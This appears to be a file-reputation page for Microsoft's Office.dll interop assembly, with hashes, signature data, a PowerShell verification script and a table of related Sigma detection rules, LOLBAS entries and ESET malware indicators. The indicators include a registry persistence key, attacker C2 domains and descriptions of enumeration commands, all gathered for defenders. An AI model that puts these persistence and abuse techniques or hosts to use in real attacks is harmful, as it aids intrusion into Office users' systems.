Office.dll

  • File Path: C:\Program Files (x86)\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Office.dll
  • Description: Microsoft.Office.Core

Hashes

  • MD5: 57FDD8BE6071DFC46128DCCAD5E25863
  • SHA1: F0601F41B06D836183442FE98BECD84400CF98D1
  • SHA256: 0194C022C826D59407487096D208896A2465BA1A4C58EAC1D1AB96D9C2376A7E
  • SHA384: D12328D6134315401A6BC7EA0D59409358ABCB06A5C9A4EB8B1FB9C7A1B8E6FC76C0308716DC25CB15E6FCDAA7F01D8C
  • SHA512: C9C44F63862EE6BE2C02489E6AC2DBEE91990734912809A94C73B38DFCCAF98B63F309CE75BE64631CB696788981738400B1C45DFA6872AC552B4BBD6B0E6E2C
  • SSDEEP: 12288:vsVUG62f8eQPrlGC9uk9IsbVYVsTEVcyjlycUn8:vsVUG62f8eQPrjY6VYViEX
  • IMP: DAE02F32A21E03CE65412F6E56942DAA
  • PESHA1: FC44CD355B0011F7C2864B1C1F3D9EF2590AAAC1
  • PE256: 813E1FECE65C0944DE77F774604470178AE47ACFB8CDAB1CDE43975566AE4C03

Signature

  • Status: Signature verified.
  • Serial: 330000010A2C79AED7797BA6AC00010000010A
  • Thumbprint: 3BDA323E552DB1FDE5F4FBEE75D6D5B2B187EEDC
  • Issuer: CN=Microsoft Code Signing PCA, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
  • Subject: CN=Microsoft Corporation, OU=MOPR, O=Microsoft Corporation, L=Redmond, S=Washington, C=US

File Metadata

  • Original Filename: Core Primary Interop Assembly
  • Product Name: Microsoft Office 2010
  • Company Name: Microsoft Corporation
  • File Version: 14.0.4733.1000
  • Product Version: 14.0.4733.1000
  • Language: Language Neutral
  • Legal Copyright: 2010 Microsoft Corporation. All rights reserved.
  • Machine Type: 32-bit

File Scan

  • VirusTotal Detections: 0/72
  • VirusTotal Link: https://www.virustotal.com/gui/file/0194c022c826d59407487096d208896a2465ba1a4c58eac1d1ab96d9c2376a7e/detection/
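Added example (not part of the original page): a PowerShell check that a local copy of Office.dll is the build described above. The path, SHA256, certificate thumbprint, signer subject, file version and machine type are copied from the sections above; the function names are illustrative. The machine type is read straight from the PE header rather than inferred from the install directory.

```powershell
# Added example, not part of the original page: verify a local Office.dll against the
# hash, Authenticode signer, version and machine type listed on this page.
$Path = 'C:\Program Files (x86)\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Office.dll'
$Expected = @{
    SHA256     = '0194C022C826D59407487096D208896A2465BA1A4C58EAC1D1AB96D9C2376A7E'
    Thumbprint = '3BDA323E552DB1FDE5F4FBEE75D6D5B2B187EEDC'
    Subject    = 'CN=Microsoft Corporation, OU=MOPR, O=Microsoft Corporation, L=Redmond, S=Washington, C=US'
    Version    = '14.0.4733.1000'
    Machine    = 'x86 (32-bit)'
}

# Read IMAGE_FILE_HEADER.Machine directly: e_lfanew at offset 0x3C points to the
# 'PE\0\0' signature, and the 16-bit Machine field follows it.
function Get-PEMachine {
    param([string]$FilePath)
    $b = [IO.File]::ReadAllBytes($FilePath)
    $peOffset = [BitConverter]::ToInt32($b, 0x3C)
    if ([BitConverter]::ToUInt32($b, $peOffset) -ne 0x00004550) { throw "Not a PE file: $FilePath" }
    $machine = [BitConverter]::ToUInt16($b, $peOffset + 4)
    switch ($machine) {
        0x014C  { 'x86 (32-bit)' }
        0x8664  { 'x64' }
        0xAA64  { 'ARM64' }
        default { 'unknown (0x{0:X4})' -f $machine }
    }
}

function Test-KnownBinary {
    param([string]$FilePath, [hashtable]$Expected)
    if (-not (Test-Path -LiteralPath $FilePath)) { throw "Not found: $FilePath" }

    $sha256  = (Get-FileHash -LiteralPath $FilePath -Algorithm SHA256).Hash
    $sig     = Get-AuthenticodeSignature -LiteralPath $FilePath
    $verInfo = (Get-Item -LiteralPath $FilePath).VersionInfo
    $machine = Get-PEMachine -FilePath $FilePath

    # 'Valid' means the signature verified AND the chain is trusted on this host;
    # pin the leaf certificate as well, a valid status alone is not enough.
    $signerOk = $sig.Status -eq 'Valid' -and
                $sig.SignerCertificate.Thumbprint -eq $Expected.Thumbprint -and
                $sig.SignerCertificate.Subject -eq $Expected.Subject

    [pscustomobject]@{
        Path            = $FilePath
        SHA256          = $sha256
        HashMatches     = ($sha256 -eq $Expected.SHA256)
        SignatureStatus = $sig.Status
        Signer          = $sig.SignerCertificate.Subject
        SignerMatches   = $signerOk
        FileVersion     = $verInfo.FileVersion
        VersionMatches  = ($verInfo.FileVersion -eq $Expected.Version)
        Machine         = $machine
        MachineMatches  = ($machine -eq $Expected.Machine)
    }
}

Test-KnownBinary -FilePath $Path -Expected $Expected | Format-List
```

Read the result as a whole: a hash mismatch with a still-valid Microsoft signature and matching subject usually means a different build of the same assembly, whereas a signer mismatch or a status other than Valid on a file at this path is what deserves attention. Get-AuthenticodeSignature also accepts catalog-signed files, and Status reflects the certificate trust of the host it runs on, so run it on the machine being investigated, not on a copy moved elsewhere.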

Possible Misuse

The following table contains possible examples of Office.dll being misused. While Office.dll is not inherently malicious, its legitimate functionality can be abused for malicious purposes. Two caveats when reading it: the rows are collected by matching the word "Office", so most describe Office applications (Winword.exe, Excel.exe), Office documents and macros, or Office 365 rather than this particular file; and Office.dll itself is the managed Core primary interop assembly (Microsoft.Office.Core, version 14.0.4733.1000) that ships in the Power Query for Excel add-in directory, so a legitimate load of it by EXCEL.EXE is exactly the kind of event the "dotNET DLL Loaded Via Office Applications" rules below fire on. Baseline that load by path, hash and signer (listed above) rather than suppressing the rule.

Source Source File Example License
sigma godmode_sigma_rule.yml # Office Dropper Detection DRL 1.0
sigma proxy_ua_apt.yml - 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)' # https://www.fireeye.com/blog/threat-research/2018/07/microsoft-office-vulnerabilities-used-to-distribute-felixroot-backdoor.html DRL 1.0
sigma sysmon_office_persistence.yml title: Microsoft Office Add-In Loading DRL 1.0
sigma sysmon_susp_office_dotnet_assembly_dll_load.yml title: dotNET DLL Loaded Via Office Applications DRL 1.0
sigma sysmon_susp_office_dotnet_assembly_dll_load.yml description: Detects any assembly DLL being loaded by an Office Product DRL 1.0
sigma sysmon_susp_office_dotnet_clr_dll_load.yml title: CLR DLL Loaded Via Office Applications DRL 1.0
sigma sysmon_susp_office_dotnet_clr_dll_load.yml description: Detects CLR DLL being loaded by an Office Product DRL 1.0
sigma sysmon_susp_office_dotnet_gac_dll_load.yml title: GAC DLL Loaded Via Office Applications DRL 1.0
sigma sysmon_susp_office_dotnet_gac_dll_load.yml description: Detects any GAC DLL being loaded by an Office Product DRL 1.0
sigma sysmon_susp_office_dsparse_dll_load.yml title: Active Directory Parsing DLL Loaded Via Office Applications DRL 1.0
sigma sysmon_susp_office_dsparse_dll_load.yml description: Detects DSParse DLL being loaded by an Office Product DRL 1.0
sigma sysmon_susp_office_kerberos_dll_load.yml title: Active Directory Kerberos DLL Loaded Via Office Applications DRL 1.0
sigma sysmon_susp_office_kerberos_dll_load.yml description: Detects Kerberos DLL being loaded by an Office Product DRL 1.0
sigma sysmon_malware_verclsid_shellcode.yml description: Detects a process access to verclsid.exe that injects shellcode from a Microsoft Office application / VBA macro DRL 1.0
sigma sysmon_malware_verclsid_shellcode.yml SourceImage: '*\Microsoft Office\\*' DRL 1.0
sigma win_exploit_cve_2017_11882.yml - https://www.google.com/url?hl=en&q=https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about&source=gmail&ust=1511481120837000&usg=AFQjCNGdL7gVwLXaNSl2Td8ylDYbSJFmPw DRL 1.0
sigma win_office_shell.yml title: Microsoft Office Product Spawning Windows Shell DRL 1.0
sigma win_office_spawn_exe_from_users_directory.yml title: MS Office Product Spawning Exe in User Dir DRL 1.0
sigma win_susp_msoffice.yml title: Malicious Payload Download via Office Binaries DRL 1.0
sigma win_susp_msoffice.yml - https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191 DRL 1.0
sigma sysmon_office_test_regadd.yml title: Office Application Startup - Office Test DRL 1.0
sigma sysmon_office_test_regadd.yml description: Detects the addition of office test registry that allows a user to specify an arbitrary DLL that will be executed everytime an Office application is started DRL 1.0
sigma sysmon_office_test_regadd.yml - 'HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf' DRL 1.0
sigma sysmon_office_test_regadd.yml - 'HKEY_LOCAL_MACHINE\Software\Microsoft\Office test\Special\Perf' DRL 1.0
sigma sysmon_reg_office_security.yml title: Office Security Settings Changed DRL 1.0
sigma sysmon_reg_office_security.yml description: Detects registry changes to Office macro settings DRL 1.0
LOLBAS Winword.yml Description: Document editor included with Microsoft Office.  
LOLBAS Winword.yml - Path: c:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE  
LOLBAS Appvlp.yml Description: Application Virtualization Utility Included with Microsoft Office 2016  
LOLBAS Appvlp.yml OperatingSystem: Windows 10 w/Office 2016  
LOLBAS Appvlp.yml - Path: C:\Program Files\Microsoft Office\root\client\appvlp.exe  
LOLBAS Appvlp.yml - Path: C:\Program Files (x86)\Microsoft Office\root\client\appvlp.exe  
LOLBAS Appvlp.yml - Link: https://securityboulevard.com/2018/07/attackers-test-new-document-attack-vector-that-slips-past-office-defenses/  
LOLBAS Excel.yml Description: Microsoft Office binary  
LOLBAS Excel.yml - Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\Excel.exe  
LOLBAS Excel.yml - Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\Excel.exe  
LOLBAS Excel.yml - Path: C:\Program Files (x86)\Microsoft Office\Office16\Excel.exe  
LOLBAS Excel.yml - Path: C:\Program Files\Microsoft Office\Office16\Excel.exe  
LOLBAS Excel.yml - Path: C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\Excel.exe  
LOLBAS Excel.yml - Path: C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\Excel.exe  
LOLBAS Excel.yml - Path: C:\Program Files (x86)\Microsoft Office\Office15\Excel.exe  
LOLBAS Excel.yml - Path: C:\Program Files\Microsoft Office\Office15\Excel.exe  
LOLBAS Excel.yml - Path: C:\Program Files (x86)\Microsoft Office 14\ClientX86\Root\Office14\Excel.exe  
LOLBAS Excel.yml - Path: C:\Program Files\Microsoft Office 14\ClientX64\Root\Office14\Excel.exe  
LOLBAS Excel.yml - Path: C:\Program Files (x86)\Microsoft Office\Office14\Excel.exe  
LOLBAS Excel.yml - Path: C:\Program Files\Microsoft Office\Office14\Excel.exe  
LOLBAS Excel.yml - Path: C:\Program Files (x86)\Microsoft Office\Office12\Excel.exe  
LOLBAS Excel.yml - Path: C:\Program Files\Microsoft Office\Office12\Excel.exe  
LOLBAS Excel.yml - Link: https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191  
LOLBAS Powerpnt.yml Description: Microsoft Office binary.  
LOLBAS Powerpnt.yml - Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\Powerpnt.exe  
LOLBAS Powerpnt.yml - Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\Powerpnt.exe  
LOLBAS Powerpnt.yml - Path: C:\Program Files (x86)\Microsoft Office\Office16\Powerpnt.exe  
LOLBAS Powerpnt.yml - Path: C:\Program Files\Microsoft Office\Office16\Powerpnt.exe  
LOLBAS Powerpnt.yml - Path: C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\Powerpnt.exe  
LOLBAS Powerpnt.yml - Path: C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\Powerpnt.exe  
LOLBAS Powerpnt.yml - Path: C:\Program Files (x86)\Microsoft Office\Office15\Powerpnt.exe  
LOLBAS Powerpnt.yml - Path: C:\Program Files\Microsoft Office\Office15\Powerpnt.exe  
LOLBAS Powerpnt.yml - Path: C:\Program Files (x86)\Microsoft Office 14\ClientX86\Root\Office14\Powerpnt.exe  
LOLBAS Powerpnt.yml - Path: C:\Program Files\Microsoft Office 14\ClientX64\Root\Office14\Powerpnt.exe  
LOLBAS Powerpnt.yml - Path: C:\Program Files (x86)\Microsoft Office\Office14\Powerpnt.exe  
LOLBAS Powerpnt.yml - Path: C:\Program Files\Microsoft Office\Office14\Powerpnt.exe  
LOLBAS Powerpnt.yml - Path: C:\Program Files (x86)\Microsoft Office\Office12\Powerpnt.exe  
LOLBAS Powerpnt.yml - Path: C:\Program Files\Microsoft Office\Office12\Powerpnt.exe  
LOLBAS Powerpnt.yml - Link: https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191  
LOLBAS Sqldumper.yml - Path: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis\AS OLEDB\140\SQLDumper.exe  
LOLBAS Winword.yml Description: Microsoft Office binary  
LOLBAS Winword.yml - Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\winword.exe  
LOLBAS Winword.yml - Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\winword.exe  
LOLBAS Winword.yml - Path: C:\Program Files (x86)\Microsoft Office\Office16\winword.exe  
LOLBAS Winword.yml - Path: C:\Program Files\Microsoft Office\Office16\winword.exe  
LOLBAS Winword.yml - Path: C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\winword.exe  
LOLBAS Winword.yml - Path: C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\winword.exe  
LOLBAS Winword.yml - Path: C:\Program Files (x86)\Microsoft Office\Office15\winword.exe  
LOLBAS Winword.yml - Path: C:\Program Files\Microsoft Office\Office15\winword.exe  
LOLBAS Winword.yml - Path: C:\Program Files (x86)\Microsoft Office 14\ClientX86\Root\Office14\winword.exe  
LOLBAS Winword.yml - Path: C:\Program Files\Microsoft Office 14\ClientX64\Root\Office14\winword.exe  
LOLBAS Winword.yml - Path: C:\Program Files (x86)\Microsoft Office\Office14\winword.exe  
LOLBAS Winword.yml - Path: C:\Program Files\Microsoft Office\Office14\winword.exe  
LOLBAS Winword.yml - Path: C:\Program Files (x86)\Microsoft Office\Office12\winword.exe  
LOLBAS Winword.yml - Path: C:\Program Files\Microsoft Office\Office12\winword.exe  
LOLBAS Winword.yml - Link: https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191  
malware-ioc misp-dukes-operation-ghost-event.json "Office Monkeys", © ESET 2014-2018
malware-ioc misp-dukes-operation-ghost-event.json "description": "Spearphishing attachment is a specific variant of spearphishing. Spearphishing attachment is different from other forms of spearphishing in that it employs the use of malware attached to an email. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon [User Execution](https://attack.mitre.org/techniques/T1204) to gain execution.\n\nThere are many options for the attachment such as Microsoft Office documents, executables, PDFs, or archived files. Upon opening the attachment (and potentially clicking past protections), the adversary's payload exploits a vulnerability or directly executes on the user's system. The text of the spearphishing email usually tries to give a plausible reason why the file should be opened, and may explain how to bypass system protections in order to do so. The email may also contain instructions on how to decrypt an attachment, such as a zip file password, in order to evade email boundary defenses. Adversaries frequently manipulate file extensions and icons in order to make attached executables appear to be document files, or files exploiting one application appear to be a file for a different one.", © ESET 2014-2018
malware-ioc misp-dukes-operation-ghost-event.json "description": "Adversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and PowerShell but could also be in the form of command-line batch scripts.\n\nScripts can be embedded inside Office documents as macros that can be set to execute when files used in [Spearphishing Attachment](https://attack.mitre.org/techniques/T1193) and other types of spearphishing are opened. Malicious embedded macros are an alternative means of execution than software exploitation through [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), where adversaries will rely on macros being allowed or that the user will accept to activate them.\n\nMany popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. Metasploit (Citation: Metasploit_Ref), Veil (Citation: Veil_Ref), and PowerSploit (Citation: Powersploit) are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell. (Citation: Alperovitch 2014)", © ESET 2014-2018
malware-ioc misp-dukes-operation-ghost-event.json "https://www.uperesia.com/analyzing-malicious-office-documents" © ESET 2014-2018
malware-ioc misp-dukes-operation-ghost-event.json "https://github.com/itsreallynick/office-crackros" © ESET 2014-2018
malware-ioc gamaredon |DFC941F365E065187B5C4A4BF42E770035920856|C# Office macro injection module|Win32/Pterodo.XG.gen © ESET 2014-2018
malware-ioc gamaredon |9AFC9D6D72F78B2EB72C5F2B87BDC7D59C1A14ED|Batch file/VBScript Office macro injection module|Win32/Pterodo.ZM © ESET 2014-2018
malware-ioc gamaredon office-constructor.ddns.net © ESET 2014-2018
malware-ioc interception https://km.wu.ac[.]th/image/office.jpg © ESET 2014-2018
malware-ioc misp_invisimole.json "description": "Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.\n\nSeveral types exist:\n\n### Browser-based Exploitation\n\nWeb browsers are a common target through [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) and [Spearphishing Link](https://attack.mitre.org/techniques/T1192). Endpoint systems may be compromised through normal web browsing or from certain users being targeted by links in spearphishing emails to adversary controlled sites used to exploit the web browser. These often do not require an action by the user for the exploit to be executed.\n\n### Office Applications\n\nCommon office and productivity applications such as Microsoft Office are also targeted through [Spearphishing Attachment](https://attack.mitre.org/techniques/T1193), [Spearphishing Link](https://attack.mitre.org/techniques/T1192), and [Spearphishing via Service](https://attack.mitre.org/techniques/T1194). Malicious files will be transmitted directly as attachments or through links to download them. These require the user to open the document or file for the exploit to run.\n\n### Common Third-party Applications\n\nOther applications that are commonly seen or are part of the software deployed in a target network may also be used for exploitation. Applications such as Adobe Reader and Flash, which are common in enterprise environments, have been routinely targeted by adversaries attempting to gain access to systems. Depending on the software and nature of the vulnerability, some may be exploited in the browser or require the user to open a file. For instance, some Flash exploits have been delivered as objects within Microsoft Office documents.", © ESET 2014-2018
malware-ioc misp_invisimole.json "description": "Adversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and [PowerShell](https://attack.mitre.org/techniques/T1086) but could also be in the form of command-line batch scripts.\n\nScripts can be embedded inside Office documents as macros that can be set to execute when files used in [Spearphishing Attachment](https://attack.mitre.org/techniques/T1193) and other types of spearphishing are opened. Malicious embedded macros are an alternative means of execution than software exploitation through [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), where adversaries will rely on macros being allowed or that the user will accept to activate them.\n\nMany popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. Metasploit (Citation: Metasploit_Ref), Veil (Citation: Veil_Ref), and PowerSploit (Citation: Powersploit) are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell. (Citation: Alperovitch 2014)", © ESET 2014-2018
malware-ioc misp_invisimole.json "https://www.uperesia.com/analyzing-malicious-office-documents" © ESET 2014-2018
malware-ioc misp_invisimole.json "https://github.com/itsreallynick/office-crackros" © ESET 2014-2018
malware-ioc misp_invisimole.json "Office 365 account logs", © ESET 2014-2018
malware-ioc misp_invisimole.json "Office 365", © ESET 2014-2018
malware-ioc misp_invisimole.json "description": "Adversaries may attempt to get a listing of local system or domain accounts. \n\n### Windows\n\nExample commands that can acquire this information are <code>net user</code>, <code>net group <groupname></code>, and <code>net localgroup <groupname></code> using the [Net](https://attack.mitre.org/software/S0039) utility or through use of [dsquery](https://attack.mitre.org/software/S0105). If adversaries attempt to identify the primary user, currently logged in user, or set of users that commonly uses a system, [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) may apply.\n\n### Mac\n\nOn Mac, groups can be enumerated through the <code>groups</code> and <code>id</code> commands. In mac specifically, <code>dscl . list /Groups</code> and <code>dscacheutil -q group</code> can also be used to enumerate groups and users.\n\n### Linux\n\nOn Linux, local users can be enumerated through the use of the <code>/etc/passwd</code> file which is world readable. In mac, this same file is only used in single-user mode in addition to the <code>/etc/master.passwd</code> file.\n\nAlso, groups can be enumerated through the <code>groups</code> and <code>id</code> commands.\n\n### Office 365 and Azure AD\n\nWith authenticated access there are several tools that can be used to find accounts. The <code>Get-MsolRoleMember</code> PowerShell cmdlet can be used to obtain account names given a role or permissions group.(Citation: Microsoft msolrolemember)(Citation: GitHub Raindance)\n\nAzure CLI (AZ CLI) also provides an interface to obtain user accounts with authenticated access to a domain. The command <code>az ad user list</code> will list all users within a domain.(Citation: Microsoft AZ CLI)(Citation: Black Hills Red Teaming MS AD Azure, 2018) \n\nThe <code>Get-GlobalAddressList</code> PowerShell cmdlet can be used to obtain email addresses and accounts from a domain using an authenticated session.(Citation: Microsoft getglobaladdresslist)(Citation: Black Hills Attacking Exchange MailSniper, 2016)", © ESET 2014-2018
malware-ioc nouns.txt office © ESET 2014-2018
malware-ioc oceanlotus-macOS.misp.event.json "https:\/\/github.com\/itsreallynick\/office-crackros", © ESET 2014-2018
malware-ioc oceanlotus-rtf_ocx_campaigns.misp.event.json "value": "office.ourkekwiciver.com", © ESET 2014-2018
malware-ioc oceanlotus-rtf_ocx_campaigns.misp.event.json "description": "Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.\n\nSeveral types exist:\n\n===Browser-based Exploitation===\n\nWeb browsers are a common target through Drive-by Compromise and Spearphishing Link. Endpoint systems may be compromised through normal web browsing or from certain users being targeted by links in spearphishing emails to adversary controlled sites used to exploit the web browser. These often do not require an action by the user for the exploit to be executed.\n\n===Office Applications===\n\nCommon office and productivity applications such as Microsoft Office are also targeted through Spearphishing Attachment, Spearphishing Link, and Spearphishing via Service. Malicious files will be transmitted directly as attachments or through links to download them. These require the user to open the document or file for the exploit to run.\n\n===Common Third-party Applications===\n\nOther applications that are commonly seen or are part of the software deployed in a target network may also be used for exploitation. Applications such as Adobe Reader and Flash, which are common in enterprise environments, have been routinely targeted by adversaries attempting to gain access to systems. Depending on the software and nature of the vulnerability, some may be exploited in the browser or require the user to open a file. For instance, some Flash exploits have been delivered as objects within Microsoft Office documents.\n\nDetection: Detecting software exploitation may be difficult depending on the tools available. Also look for behavior on the endpoint system that might indicate successful compromise, such as abnormal behavior of the browser or Office processes. This could include suspicious files written to disk, evidence of Process Injection for attempts to hide execution, evidence of Discovery, or other unusual network traffic that may indicate additional tools transferred to the system.\n\nPlatforms: Linux, Windows, macOS\n\nData Sources: Anti-virus, System calls, Process Monitoring\n\nSystem Requirements: Remote exploitation for execution requires a remotely accessible service reachable over the network or other vector of access such as spearphishing or drive-by compromise.\n\nRemote Support: Yes", © ESET 2014-2018
malware-ioc oceanlotus-rtf_ocx_campaigns.misp.event.json "description": "Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.\n\nPayloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used during Initial Access or later to mitigate detection. Sometimes a user's action may be required to open and Deobfuscate\/Decode Files or Information for User Execution. The user may also be required to input a password to open a password protected compressed\/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016) Adversaries may also used compressed or archived scripts, such as Javascript.\n\nPortions of files can also be encoded to hide the plain-text strings that would otherwise help defenders with discovery. (Citation: Linux\/Cdorked.A We Live Security Analysis) Payloads may also be split into separate, seemingly benign files that only reveal malicious functionality when reassembled. (Citation: Carbon Black Obfuscation Sept 2016)\n\nAdversaries may also obfuscate commands executed from payloads or directly via a Command-Line Interface. Environment variables, aliases, characters, and other platform\/language specific semantics can be used to evade signature based detections and whitelisting mechanisms. (Citation: FireEye Obfuscation June 2017) (Citation: FireEye Revoke-Obfuscation July 2017) (Citation: PaloAlto EncodedCommand March 2017)\n\nAnother example of obfuscation is through the use of steganography, a technique of hiding messages or code in images, audio tracks, video clips, or text files. One of the first known and reported adversaries that used steganography activity surrounding Invoke-PSImage. The Duqu malware encrypted the gathered information from a victim's system and hid it into an image followed by exfiltrating the image to a C2 server. (Citation: Wikipedia Duqu) By the end of 2017, an adversary group used Invoke-PSImage to hide PowerShell commands in an image file (png) and execute the code on a victim's system. In this particular case the PowerShell code downloaded another obfuscated script to gather intelligence from the victim's machine and communicate it back to the adversary. (Citation: McAfee Malicious Doc Targets Pyeongchang Olympics)\n\nDetection: Detection of file obfuscation is difficult unless artifacts are left behind by the obfuscation process that are uniquely detectable with a signature. If detection of the obfuscation itself is not possible, it may be possible to detect the malicious activity that caused the obfuscated file (for example, the method that was used to write, read, or modify the file on the file system).\n\nFlag and analyze commands containing indicators of obfuscation and known suspicious syntax such as uninterpreted escape characters like '''^''' and '''\"'''. Windows' Sysmon and Event ID 4688 displays command-line arguments for processes. Deobfuscation tools can be used to detect these indicators in files\/payloads. (Citation: GitHub Revoke-Obfuscation) (Citation: FireEye Revoke-Obfuscation July 2017) (Citation: GitHub Office-Crackros Aug 2016)\n\nObfuscation used in payloads for Initial Access can be detected at the network. Use network intrusion detection systems and email gateway filtering to identify compressed and encrypted attachments and scripts. Some email attachment detonation systems can open compressed and encrypted attachments. Payloads delivered over an encrypted connection from a website require encrypted network traffic inspection.\n\nPlatforms: Linux, macOS, Windows\n\nData Sources: Network protocol analysis, Process use of network, Binary file metadata, File monitoring, Malware reverse engineering, Process command-line parameters, Environment variable, Process Monitoring, Windows event logs, Network intrusion detection system, Email gateway, SSL\/TLS inspection\n\nDefense Bypassed: Host forensic analysis, Signature-based detection, Host intrusion prevention systems, Application whitelisting, Process whitelisting, Log analysis, Whitelisting by file name or path\n\nContributors: Red Canary, Christiaan Beek, @ChristiaanBeek", © ESET 2014-2018
malware-ioc oceanlotus-rtf_ocx_campaigns.misp.event.json "https:\/\/github.com\/itsreallynick\/office-crackros"] © ESET 2014-2018
malware-ioc oceanlotus-rtf_ocx_campaigns.misp.event.json "description": "Spearphishing attachment is a specific variant of spearphishing. Spearphishing attachment is different from other forms of spearphishing in that it employs the use of malware attached to an email. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon User Execution to gain execution.\n\nThere are many options for the attachment such as Microsoft Office documents, executables, PDFs, or archived files. Upon opening the attachment (and potentially clicking past protections), the adversary's payload exploits a vulnerability or directly executes on the user's system. The text of the spearphishing email usually tries to give a plausible reason why the file should be opened, and may explain how to bypass system protections in order to do so. The email may also contain instructions on how to decrypt an attachment, such as a zip file password, in order to evade email boundary defenses. adversaries frequently manipulate file extensions and icons in order to make attached executables appear to be document files, or files exploiting one application appear to be a file for a different one.\n\nDetection: Network intrusion detection systems and email gateways can be used to detect spearphishing with malicious attachments in transit. Detonation chambers may also be used to identify malicious attachments. Solutions can be signature and behavior based, but adversaries may construct attachments in a way to avoid these systems.\n\nAnti-virus can potentially detect malicious documents and attachments as they're scanned to be stored on the email server or on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the attachment is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning Powershell.exe) for techniques such as Exploitation for Client Execution and Scripting.\n\nPlatforms: Linux, Windows, macOS\n\nData Sources: File monitoring, Packet capture, Mail server, Network intrusion detection system, Detonation chamber, Email gateway", © ESET 2014-2018
malware-ioc oceanlotus * office.ourkekwiciver.com © ESET 2014-2018
malware-ioc 2017-05-09_Trump_Attack_on_Syria_IoCs.adoc - 18b7dd3917231d7bae93c11f915e9702aa5d1bbb - Office RCE © ESET 2014-2018
malware-ioc 2017-05-09_Trump_Attack_on_Syria_IoCs.adoc - HKCU\Software\Microsoft\Office test\Special\Perf|%TEMP%\apisecconnect.dll © ESET 2014-2018
malware-ioc 2017-05-09_Trump_Attack_on_Syria_IoCs.json "value": "HKCU\\Software\\Microsoft\\Office test\\Special\\Perf|%TEMP%\\apisecconnect.dll", © ESET 2014-2018
malware-ioc part1.adoc HKCU\Software\Microsoft\Office test\Special\Perf © ESET 2014-2018
malware-ioc stantinko var b = "mts rt megafonpro megafon mpoisk mail google yandex ya rambler youtube dfiles turbobit prom zakupka pravo letitbit ozon urokitio kismia webnice toy mdmbank tele2 roboforex share4web 7do dixy kiino 4allforum delo-press raskachaem satu spmag yugcontract narodnoe materinstvo dimonvideo kia-club deal icloud littlebyte maxpark 24video vdgb trud appsruel tiu blanker aucland office ontabfile microsoft shopotam shareflare autoportal stilagoby malina depositfiles hitfile crocs telecom effectfree forum.calorizator.ru traektoria cdek takko circ-a tinydeal otzyv mamba rusfolder irn labirint vip-file 10.150.0.104".split(" "); © ESET 2014-2018
